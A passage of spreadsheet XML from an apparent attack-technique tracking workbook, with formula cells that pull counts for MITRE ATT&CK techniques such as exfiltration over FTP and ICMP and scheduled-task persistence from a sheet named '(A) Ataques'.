        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!OC19,"")</f>
        <v>0</v>
      </c>
      <c r="BP19" s="510">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!OD19,"")</f>
        <v>0</v>
      </c>
      <c r="BQ19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!OE19,"")</f>
        <v>0</v>
      </c>
      <c r="BR19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!OF19,"")</f>
        <v>0</v>
      </c>
      <c r="BS19" s="471">
        <f>IF('(A) Ataques'!$AP19&lt;&gt;"NO",'(A) Ataques'!OJ19,"")</f>
        <v>0</v>
      </c>
      <c r="BT19" s="331">
        <f>IF('(A) Ataques'!$AK19&lt;&gt;"NO",IF($BO19=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A20" s="79">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="B20" s="4">
        <f>IF('(A) Ataques'!AK20&lt;&gt;"NO",'(A) Ataques'!E20,"")</f>
        <v>15</v>
      </c>
      <c r="C20" s="6" t="str">
        <f>IF('(A) Ataques'!AK20&lt;&gt;"NO",IF('(A) Ataques'!M20="","",'(A) Ataques'!M20),"")</f>
        <v>T1048.003-Exfiltration_over_FTP</v>
      </c>
      <c r="D20" s="4" t="str">
        <f>IF('(A) Ataques'!AK20&lt;&gt;"NO",'(A) Ataques'!F20,"")</f>
        <v>T1048</v>
      </c>
      <c r="E20" s="286">
        <f>IF('(A) Ataques'!AK20&lt;&gt;"NO",'(A) Ataques'!AQ20,"")</f>
        <v>10</v>
      </c>
      <c r="F20" s="288">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!BB20,"")</f>
        <v>2</v>
      </c>
      <c r="G20" s="392">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!BD20,"")</f>
        <v>1</v>
      </c>
      <c r="H20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!BF20,"")</f>
        <v>1</v>
      </c>
      <c r="I20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!BG20,"")</f>
        <v>1</v>
      </c>
      <c r="J20" s="530">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($F20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BH20,"")</f>
        <v>0</v>
      </c>
      <c r="L20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BJ20,"")</f>
        <v>0</v>
      </c>
      <c r="M20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BL20,"")</f>
        <v>0</v>
      </c>
      <c r="N20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BM20,"")</f>
        <v>0</v>
      </c>
      <c r="O20" s="532">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($K20=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P20" s="292">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BN20,"")</f>
        <v>2</v>
      </c>
      <c r="Q20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BP20,"")</f>
        <v>1</v>
      </c>
      <c r="R20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BR20,"")</f>
        <v>1</v>
      </c>
      <c r="S20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BS20,"")</f>
        <v>1</v>
      </c>
      <c r="T20" s="530">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($P20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BT20,"")</f>
        <v>2</v>
      </c>
      <c r="V20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BV20,"")</f>
        <v>1</v>
      </c>
      <c r="W20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BX20,"")</f>
        <v>1</v>
      </c>
      <c r="X20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$BY20,"")</f>
        <v>1</v>
      </c>
      <c r="Y20" s="532">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($U20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z20" s="288">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!BZ20,"")</f>
        <v>15</v>
      </c>
      <c r="AA20" s="392">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!CB20,"")</f>
        <v>8</v>
      </c>
      <c r="AB20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!CD20,"")</f>
        <v>6</v>
      </c>
      <c r="AC20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!CE20,"")</f>
        <v>2</v>
      </c>
      <c r="AD20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF(Z20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CF20,"")</f>
        <v>17</v>
      </c>
      <c r="AF20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CH20,"")</f>
        <v>9</v>
      </c>
      <c r="AG20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CJ20,"")</f>
        <v>7</v>
      </c>
      <c r="AH20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CK20,"")</f>
        <v>2</v>
      </c>
      <c r="AI20" s="287">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($AE20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ20" s="292">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CL20,"")</f>
        <v>0</v>
      </c>
      <c r="AK20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CN20,"")</f>
        <v>0</v>
      </c>
      <c r="AL20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CP20,"")</f>
        <v>0</v>
      </c>
      <c r="AM20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CQ20,"")</f>
        <v>0</v>
      </c>
      <c r="AN20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($AJ20=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CR20,"")</f>
        <v>0</v>
      </c>
      <c r="AP20" s="322">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CT20,"")</f>
        <v>0</v>
      </c>
      <c r="AQ20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CV20,"")</f>
        <v>0</v>
      </c>
      <c r="AR20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!$CW20,"")</f>
        <v>0</v>
      </c>
      <c r="AS20" s="287">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($AO20=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT20" s="288">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!CX20,"")</f>
        <v>2</v>
      </c>
      <c r="AU20" s="392">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!CZ20,"")</f>
        <v>1</v>
      </c>
      <c r="AV20" s="4">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!DB20,"")</f>
        <v>1</v>
      </c>
      <c r="AW20" s="20">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",'(A) Ataques'!DC20,"")</f>
        <v>1</v>
      </c>
      <c r="AX20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($AT20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY20" s="469">
        <f>'(A) Ataques'!LU20+'(A) Ataques'!MA20+'(A) Ataques'!MG20+'(A) Ataques'!MM20+'(A) Ataques'!MS20</f>
        <v>0</v>
      </c>
      <c r="AZ20" s="510">
        <f>'(A) Ataques'!LW20+'(A) Ataques'!MC20+'(A) Ataques'!MI20+'(A) Ataques'!MO20+'(A) Ataques'!MU20</f>
        <v>0</v>
      </c>
      <c r="BA20" s="471">
        <f>'(A) Ataques'!LY20+'(A) Ataques'!ME20+'(A) Ataques'!MK20+'(A) Ataques'!MQ20+'(A) Ataques'!MW20</f>
        <v>0</v>
      </c>
      <c r="BB20" s="471">
        <f>'(A) Ataques'!LQ20</f>
        <v>0</v>
      </c>
      <c r="BC20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($AY20=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD20" s="469">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!LL20,"")</f>
        <v>8</v>
      </c>
      <c r="BE20" s="510">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!LM20,"")</f>
        <v>2</v>
      </c>
      <c r="BF20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!LN20,"")</f>
        <v>0</v>
      </c>
      <c r="BG20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!LO20,"")</f>
        <v>2</v>
      </c>
      <c r="BH20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!LS20,"")</f>
        <v>2</v>
      </c>
      <c r="BI20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($BD20=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ20" s="469">
        <f>'(A) Ataques'!OL20+'(A) Ataques'!OR20+'(A) Ataques'!OX20+'(A) Ataques'!PD20+'(A) Ataques'!PJ20</f>
        <v>0</v>
      </c>
      <c r="BK20" s="510">
        <f>'(A) Ataques'!ON20+'(A) Ataques'!OT20+'(A) Ataques'!OZ20+'(A) Ataques'!PF20+'(A) Ataques'!PL20</f>
        <v>0</v>
      </c>
      <c r="BL20" s="471">
        <f>'(A) Ataques'!OP20+'(A) Ataques'!OV20+'(A) Ataques'!PB20+'(A) Ataques'!PH20+'(A) Ataques'!PN20</f>
        <v>0</v>
      </c>
      <c r="BM20" s="495">
        <f>'(A) Ataques'!OH20</f>
        <v>0</v>
      </c>
      <c r="BN20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($BJ20=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO20" s="469">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!OC20,"")</f>
        <v>0</v>
      </c>
      <c r="BP20" s="510">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!OD20,"")</f>
        <v>0</v>
      </c>
      <c r="BQ20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!OE20,"")</f>
        <v>0</v>
      </c>
      <c r="BR20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!OF20,"")</f>
        <v>0</v>
      </c>
      <c r="BS20" s="471">
        <f>IF('(A) Ataques'!$AP20&lt;&gt;"NO",'(A) Ataques'!OJ20,"")</f>
        <v>0</v>
      </c>
      <c r="BT20" s="331">
        <f>IF('(A) Ataques'!$AK20&lt;&gt;"NO",IF($BO20=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A21" s="79">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="B21" s="4">
        <f>IF('(A) Ataques'!AK21&lt;&gt;"NO",'(A) Ataques'!E21,"")</f>
        <v>15</v>
      </c>
      <c r="C21" s="6" t="str">
        <f>IF('(A) Ataques'!AK21&lt;&gt;"NO",IF('(A) Ataques'!M21="","",'(A) Ataques'!M21),"")</f>
        <v xml:space="preserve">T1048.003-Exfiltration_over_ICMP </v>
      </c>
      <c r="D21" s="4" t="str">
        <f>IF('(A) Ataques'!AK21&lt;&gt;"NO",'(A) Ataques'!F21,"")</f>
        <v>T1048</v>
      </c>
      <c r="E21" s="286">
        <f>IF('(A) Ataques'!AK21&lt;&gt;"NO",'(A) Ataques'!AQ21,"")</f>
        <v>2</v>
      </c>
      <c r="F21" s="288">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!BB21,"")</f>
        <v>0</v>
      </c>
      <c r="G21" s="392">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!BD21,"")</f>
        <v>0</v>
      </c>
      <c r="H21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!BF21,"")</f>
        <v>0</v>
      </c>
      <c r="I21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!BG21,"")</f>
        <v>0</v>
      </c>
      <c r="J21" s="530">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($F21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BH21,"")</f>
        <v>0</v>
      </c>
      <c r="L21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BJ21,"")</f>
        <v>0</v>
      </c>
      <c r="M21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BL21,"")</f>
        <v>0</v>
      </c>
      <c r="N21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BM21,"")</f>
        <v>0</v>
      </c>
      <c r="O21" s="532">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($K21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P21" s="292">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BN21,"")</f>
        <v>0</v>
      </c>
      <c r="Q21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BP21,"")</f>
        <v>0</v>
      </c>
      <c r="R21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BR21,"")</f>
        <v>0</v>
      </c>
      <c r="S21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BS21,"")</f>
        <v>0</v>
      </c>
      <c r="T21" s="530">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($P21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BT21,"")</f>
        <v>64</v>
      </c>
      <c r="V21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BV21,"")</f>
        <v>4</v>
      </c>
      <c r="W21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BX21,"")</f>
        <v>4</v>
      </c>
      <c r="X21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$BY21,"")</f>
        <v>1</v>
      </c>
      <c r="Y21" s="532">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($U21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z21" s="288">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!BZ21,"")</f>
        <v>36</v>
      </c>
      <c r="AA21" s="392">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!CB21,"")</f>
        <v>4</v>
      </c>
      <c r="AB21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!CD21,"")</f>
        <v>4</v>
      </c>
      <c r="AC21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!CE21,"")</f>
        <v>1</v>
      </c>
      <c r="AD21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF(Z21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CF21,"")</f>
        <v>100</v>
      </c>
      <c r="AF21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CH21,"")</f>
        <v>8</v>
      </c>
      <c r="AG21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CJ21,"")</f>
        <v>8</v>
      </c>
      <c r="AH21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CK21,"")</f>
        <v>1</v>
      </c>
      <c r="AI21" s="287">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($AE21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ21" s="292">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CL21,"")</f>
        <v>0</v>
      </c>
      <c r="AK21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CN21,"")</f>
        <v>0</v>
      </c>
      <c r="AL21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CP21,"")</f>
        <v>0</v>
      </c>
      <c r="AM21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CQ21,"")</f>
        <v>0</v>
      </c>
      <c r="AN21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($AJ21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CR21,"")</f>
        <v>48</v>
      </c>
      <c r="AP21" s="322">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CT21,"")</f>
        <v>3</v>
      </c>
      <c r="AQ21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CV21,"")</f>
        <v>3</v>
      </c>
      <c r="AR21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!$CW21,"")</f>
        <v>1</v>
      </c>
      <c r="AS21" s="287">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($AO21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT21" s="288">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!CX21,"")</f>
        <v>48</v>
      </c>
      <c r="AU21" s="392">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!CZ21,"")</f>
        <v>3</v>
      </c>
      <c r="AV21" s="4">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!DB21,"")</f>
        <v>3</v>
      </c>
      <c r="AW21" s="20">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",'(A) Ataques'!DC21,"")</f>
        <v>1</v>
      </c>
      <c r="AX21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($AT21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY21" s="469">
        <f>'(A) Ataques'!LU21+'(A) Ataques'!MA21+'(A) Ataques'!MG21+'(A) Ataques'!MM21+'(A) Ataques'!MS21</f>
        <v>0</v>
      </c>
      <c r="AZ21" s="510">
        <f>'(A) Ataques'!LW21+'(A) Ataques'!MC21+'(A) Ataques'!MI21+'(A) Ataques'!MO21+'(A) Ataques'!MU21</f>
        <v>0</v>
      </c>
      <c r="BA21" s="471">
        <f>'(A) Ataques'!LY21+'(A) Ataques'!ME21+'(A) Ataques'!MK21+'(A) Ataques'!MQ21+'(A) Ataques'!MW21</f>
        <v>0</v>
      </c>
      <c r="BB21" s="471">
        <f>'(A) Ataques'!LQ21</f>
        <v>0</v>
      </c>
      <c r="BC21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($AY21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD21" s="469">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!LL21,"")</f>
        <v>1</v>
      </c>
      <c r="BE21" s="510">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!LM21,"")</f>
        <v>1</v>
      </c>
      <c r="BF21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!LN21,"")</f>
        <v>0</v>
      </c>
      <c r="BG21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!LO21,"")</f>
        <v>1</v>
      </c>
      <c r="BH21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!LS21,"")</f>
        <v>1</v>
      </c>
      <c r="BI21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($BD21=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ21" s="469">
        <f>'(A) Ataques'!OL21+'(A) Ataques'!OR21+'(A) Ataques'!OX21+'(A) Ataques'!PD21+'(A) Ataques'!PJ21</f>
        <v>0</v>
      </c>
      <c r="BK21" s="510">
        <f>'(A) Ataques'!ON21+'(A) Ataques'!OT21+'(A) Ataques'!OZ21+'(A) Ataques'!PF21+'(A) Ataques'!PL21</f>
        <v>0</v>
      </c>
      <c r="BL21" s="471">
        <f>'(A) Ataques'!OP21+'(A) Ataques'!OV21+'(A) Ataques'!PB21+'(A) Ataques'!PH21+'(A) Ataques'!PN21</f>
        <v>0</v>
      </c>
      <c r="BM21" s="495">
        <f>'(A) Ataques'!OH21</f>
        <v>0</v>
      </c>
      <c r="BN21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($BJ21=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO21" s="469">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!OC21,"")</f>
        <v>0</v>
      </c>
      <c r="BP21" s="510">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!OD21,"")</f>
        <v>0</v>
      </c>
      <c r="BQ21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!OE21,"")</f>
        <v>0</v>
      </c>
      <c r="BR21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!OF21,"")</f>
        <v>0</v>
      </c>
      <c r="BS21" s="471">
        <f>IF('(A) Ataques'!$AP21&lt;&gt;"NO",'(A) Ataques'!OJ21,"")</f>
        <v>0</v>
      </c>
      <c r="BT21" s="331">
        <f>IF('(A) Ataques'!$AK21&lt;&gt;"NO",IF($BO21=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A22" s="79">
        <f t="shared" si="0"/>
        <v>20</v>
      </c>
      <c r="B22" s="4">
        <f>IF('(A) Ataques'!AK22&lt;&gt;"NO",'(A) Ataques'!E22,"")</f>
        <v>16</v>
      </c>
      <c r="C22" s="6" t="str">
        <f>IF('(A) Ataques'!AK22&lt;&gt;"NO",IF('(A) Ataques'!M22="","",'(A) Ataques'!M22),"")</f>
        <v>T1053.002-Scheduled_TaskJob_At</v>
      </c>
      <c r="D22" s="4" t="str">
        <f>IF('(A) Ataques'!AK22&lt;&gt;"NO",'(A) Ataques'!F22,"")</f>
        <v>T1053</v>
      </c>
      <c r="E22" s="286">
        <f>IF('(A) Ataques'!AK22&lt;&gt;"NO",'(A) Ataques'!AQ22,"")</f>
        <v>2</v>
      </c>
      <c r="F22" s="288">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!BB22,"")</f>
        <v>1</v>
      </c>
      <c r="G22" s="392">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!BD22,"")</f>
        <v>1</v>
      </c>
      <c r="H22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!BF22,"")</f>
        <v>1</v>
      </c>
      <c r="I22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!BG22,"")</f>
        <v>1</v>
      </c>
      <c r="J22" s="530">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($F22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BH22,"")</f>
        <v>14</v>
      </c>
      <c r="L22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BJ22,"")</f>
        <v>4</v>
      </c>
      <c r="M22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BL22,"")</f>
        <v>4</v>
      </c>
      <c r="N22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BM22,"")</f>
        <v>2</v>
      </c>
      <c r="O22" s="532">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($K22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P22" s="292">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BN22,"")</f>
        <v>15</v>
      </c>
      <c r="Q22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BP22,"")</f>
        <v>5</v>
      </c>
      <c r="R22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BR22,"")</f>
        <v>5</v>
      </c>
      <c r="S22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BS22,"")</f>
        <v>2</v>
      </c>
      <c r="T22" s="530">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($P22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BT22,"")</f>
        <v>25</v>
      </c>
      <c r="V22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BV22,"")</f>
        <v>8</v>
      </c>
      <c r="W22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BX22,"")</f>
        <v>7</v>
      </c>
      <c r="X22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$BY22,"")</f>
        <v>2</v>
      </c>
      <c r="Y22" s="532">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF($U22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z22" s="288">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!BZ22,"")</f>
        <v>52</v>
      </c>
      <c r="AA22" s="392">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!CB22,"")</f>
        <v>15</v>
      </c>
      <c r="AB22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!CD22,"")</f>
        <v>12</v>
      </c>
      <c r="AC22" s="20">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!CE22,"")</f>
        <v>2</v>
      </c>
      <c r="AD22" s="331">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",IF(Z22=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CF22,"")</f>
        <v>77</v>
      </c>
      <c r="AF22" s="322">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CH22,"")</f>
        <v>23</v>
      </c>
      <c r="AG22" s="4">
        <f>IF('(A) Ataques'!$AK22&lt;&gt;"NO",'(A) Ataques'!$CJ22,"")</f>
        <v>19</v>
      </c>
      <c r="AH22" s="20">
